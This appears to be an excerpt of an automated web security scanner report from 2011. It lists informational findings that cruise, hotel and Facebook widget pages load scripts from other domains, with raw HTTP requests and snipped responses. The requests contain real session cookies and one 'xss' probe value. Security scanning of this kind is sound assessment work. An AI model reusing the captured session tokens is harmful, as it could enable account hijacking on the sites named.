Host:   https://www.cruisesonly.com
Path:   /bcss/default.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bcss/default.asp?bn=88888888&ln=xss&custservice_submit.x=10&custservice_submit.y=8&custservice_submit=Y&CID=6386 HTTP/1.1
Host: www.cruisesonly.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/cs/default.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; AFF%5FCID=%22%22; sid=6386; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 46341
Content-Type: text/html
Set-Cookie: partnerStamp=21960764; domain=; path=/
Set-Cookie: AFF%5FCID=6386; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Cache-control: private
Content-Length: 46341


   <script language="Javascript" src="/lib/javascript/validation/messagingobjects.js"></script>
<script language="javascript" src="/code/javascript/JSPopup.js"></script>
   <script languag
...[SNIP]...
</script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...
18.28. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df39b06e04%26origin%3Dhttp%253A%252F%252Fwww.cruises.com%252Ffe5a763e4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=62&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FCruisescom%2F226995804003285&locale=en_US&sdk=joey&show_faces=false&stream=false&width=190 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruises.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.125.45
X-Cnection: close
Date: Mon, 03 Oct 2011 12:40:44 GMT
Content-Length: 5601

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/tRSo5dQ5Imj.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/TPy3KTYpWNB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/q7r8uOrRxLB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/_2JDxhM_bgE.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
...[SNIP]...
18.29. http://www.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /widgets/fan.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /widgets/fan.php?api_key=09addd37a06e06e413d53e5411603783&channel_url=http%3A%2F%2Fwww.cruisesonly.com%2Fpromotion%2Fbermuda-cruises.do%3Ffbc_channel%3D1&id=50243286972&name=&width=180&connections=6&stream=&logobar=&css= HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/promotion/bermuda-cruises.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.137.53
X-Cnection: close
Date: Mon, 03 Oct 2011 12:45:27 GMT
Content-Length: 10416

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http:
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/tRSo5dQ5Imj.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/TPy3KTYpWNB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/q7r8uOrRxLB.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/_2JDxhM_bgE.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/NdcRVhQ8IGY.js"></script>
...[SNIP]...
18.30. http://www.grandcafe-sf.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.grandcafe-sf.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.grandcafe-sf.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:54:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.16
Content-Type: text/html
Content-Length: 13266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859
...[SNIP]...
</a>-->


<script type="text/javascript" src="http://www.opentable.com/frontdoor/default.aspx?rid=90&restref=90&bgcolor=e3d4a4&titlecolor=000000&subtitlecolor=000000&btnbgimage=http://www.opentable.com/frontdoor/img/ot_btn_black.png&otlink=FFFFFF&icon=dark&mode=short"></script>
...[SNIP]...
18.31. http://www.marriott.com/search/findHotels.mi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /search/findHotels.mi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search/findHotels.mi HTTP/1.1
Host: www.marriott.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.marriott.com/default.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; mbox=check#true#1317646594|session#1317646533235-184575#1317648394|PC#1317646533235-184575.19#1318856136; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":1,"to":3,"c":"http://www.marriott.com/default.mi","lc":{"d4":{"v":1,"s":true}},"cd":4,"sd":4}; s_pers=%20s_lv%3D1317646553781%7C1412254553781%3B%20s_lv_s%3DFirst%2520Visit%7C1317648353781%3B; HDFind=true; JVMID=pEbizMdcomD167_prd1; MI_SITE=prod3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Date: Mon, 03 Oct 2011 12:56:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 324156


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   

<html xmlns="http://www.w3.org/1999/x
...[SNIP]...
</script>        
           
       
                   <script type="text/javascript" src="http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.2"></script>
...[SNIP]...
18.32. http://www.marriottvacationclub.com/index.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriottvacationclub.com
Path:   /index.shtml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.shtml HTTP/1.1
Host: www.marriottvacationclub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 13:02:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 40739
Content-Type: text/html
Connection: close
Via: 1.1 mcoatprdslb2 (Juniper Networks Application Acceleration Platform - DX 5.3.2 0)
Set-Cookie: rl-sticky-key=0ace8fd9; path=/; expires=Mon, 03 Oct 2011 13:07:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv
...[SNIP]...
</script>
<script src="https://dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.2&s=1" type="text/javascript">// </script>
...[SNIP]...
18.33. http://www.ncl.com/nclweb/cbooking/pricingQualifierForm.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ncl.com
Path:   /nclweb/cbooking/pricingQualifierForm.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /nclweb/cbooking/pricingQualifierForm.html;jsessionid=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336 HTTP/1.1
Host: www.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.4.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_nr%3D1317646122505-New%7C1320238122505%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fcbooking%2525252FsubmitCruiseDetailsForm.html%2525253FpackageId%2525253D1912713%25252526itineraryCode%2525253D1581%252526ot%25253DA%3B; JSESSIONID=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336; NCLPERSIST1=868788416.20480.0000

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Vary: Accept-Encoding
P3P: policyref="http://www.ncl.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONi HISo TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV LOC"
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 69014
Date: Mon, 03 Oct 2011 12:48:23 GMT
Connection: close


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<head>
<meta charset="utf-8">
<title>


NCL - Ge
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/utilities/utilities.js"></script>
...[SNIP]...
<div id="footer">


<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<!-- End Modal Area -->


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/event-mouseenter/event-mouseenter-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/json/json-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/container/container-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/button/button-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/cookie/cookie-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
18.34. http://www.ncl.com/nclweb/cbooking/submitPricingQualifiers.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ncl.com
Path:   /nclweb/cbooking/submitPricingQualifiers.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /nclweb/cbooking/submitPricingQualifiers.html HTTP/1.1
Host: www.ncl.com
Proxy-Connection: keep-alive
Content-Length: 250
Cache-Control: max-age=0
Origin: http://www.ncl.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ncl.com/nclweb/cbooking/pricingQualifierForm.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; JSESSIONID=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336; NCLPERSIST1=868788416.20480.0000; s_pers=%20s_nr%3D1317646123362-New%7C1320238123362%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packa%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fcbooking%2525252FsubmitCruiseDetailsForm.html%2525253FpackageId%2525253D1912713%25252526itineraryCode%2525253D1581%252526ot%25253DA%3B; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.5.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_nr=1317646128958; s_sq=%5B%5BB%5D%5D

guestQuantity=2&guestAges%5B0%5D=&guestAges%5B1%5D=&guestAges%5B2%5D=&guestAges%5B3%5D=&guestAges%5B4%5D=&guestAges%5B5%5D=&guestAges%5B6%5D=&guestAges%5B7%5D=&airTransportationCity=NONE&interestedInP
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Vary: Accept-Encoding
P3P: policyref="http://www.ncl.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONi HISo TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV LOC"
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 70071
Date: Mon, 03 Oct 2011 12:51:08 GMT
Connection: close


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<head>
<meta charset="utf-8">
<title>


NCL - Ge
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/utilities/utilities.js"></script>
...[SNIP]...
<div id="footer">


<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<!-- End Modal Area -->


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/event-mouseenter/event-mouseenter-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/json/json-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/container/container-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/button/button-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/cookie/cookie-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
18.35. https://www.ncl.com/nclweb/secure/bookedGuestLanding.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ncl.com
Path:   /nclweb/secure/bookedGuestLanding.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /nclweb/secure/bookedGuestLanding.html HTTP/1.1
Host: www.ncl.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www2.ncl.com/cruise-destinations
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; JSESSIONID=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336; NCLPERSIST1=868788416.20480.0000; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.7.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_nr%3D1317646302860-Repeat%7C1320238302860%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%2525253A%25252520content%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%2525253A%25252520content%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fsecure%2525252FbookedGuestLanding.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Vary: Accept-Encoding
P3P: policyref="http://www.ncl.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONi HISo TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV LOC"
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 55571
Date: Mon, 03 Oct 2011 12:51:26 GMT
Connection: keep-alive


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<head>
<meta charset="utf-8">
<title>


My NCL</
...[SNIP]...
</script>

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/utilities/utilities.js"></script>
...[SNIP]...
<div id="footer">


<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<!-- End Modal Area -->


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/event-mouseenter/event-mouseenter-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/json/json-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/container/container-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/menu/menu-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/button/button-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/cookie/cookie-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/selector/selector-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
18.36. https://www.ncl.com/nclweb/secure/loginBookedGuest.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ncl.com
Path:   /nclweb/secure/loginBookedGuest.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /nclweb/secure/loginBookedGuest.html HTTP/1.1
Host: www.ncl.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.ncl.com/nclweb/secure/bookedGuestLanding.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; JSESSIONID=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336; NCLPERSIST1=868788416.20480.0000; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.7.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_nr%3D1317646302860-Repeat%7C1320238302860%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%2525253A%25252520content%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%2525253A%25252520content%2525253A%25252520destination%2525253A%25252520destination%2525253A%25252520overview%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fsecure%2525252FbookedGuestLanding.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Vary: Accept-Encoding
P3P: policyref="http://www.ncl.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONi HISo TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV LOC"
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 55571
Date: Mon, 03 Oct 2011 12:51:49 GMT
Connection: keep-alive


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<head>
<meta charset="utf-8">
<title>


My NCL</
...[SNIP]...
</script>

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/utilities/utilities.js"></script>
...[SNIP]...
<div id="footer">


<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<!-- End Modal Area -->


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/event-mouseenter/event-mouseenter-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/json/json-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/container/container-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/menu/menu-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/button/button-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/cookie/cookie-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/selector/selector-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/tabview/tabview-min.js"></script>
